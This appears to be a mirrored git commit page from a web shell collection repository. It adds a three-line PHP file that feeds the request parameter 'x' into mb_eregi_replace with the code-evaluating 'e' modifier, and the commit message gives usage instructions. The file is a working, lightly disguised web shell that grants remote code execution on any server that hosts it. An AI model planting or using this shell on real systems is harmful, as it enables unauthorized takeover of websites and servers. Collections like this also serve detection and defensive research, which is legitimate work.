mirror of
https://github.com/tennc/webshell
synced 2024-11-24 20:23:04 +00:00
Create 2020.08.20.15.php
use: shell.php?e=mb_eregi_replace post x=phpinfo();
This commit is contained in:
parent
6a9169da6b
commit
ecc1fb09ee
1 changed files with 3 additions and 0 deletions
3
php/2020.08.20.15.php
Normal file
3
php/2020.08.20.15.php
Normal file
|
@ -0,0 +1,3 @@
|
|||
<?php
|
||||
mb_eregi_replace('\d', $_REQUEST['x'], '1', 'e');
|
||||
?>
|
Loading…
Reference in a new issue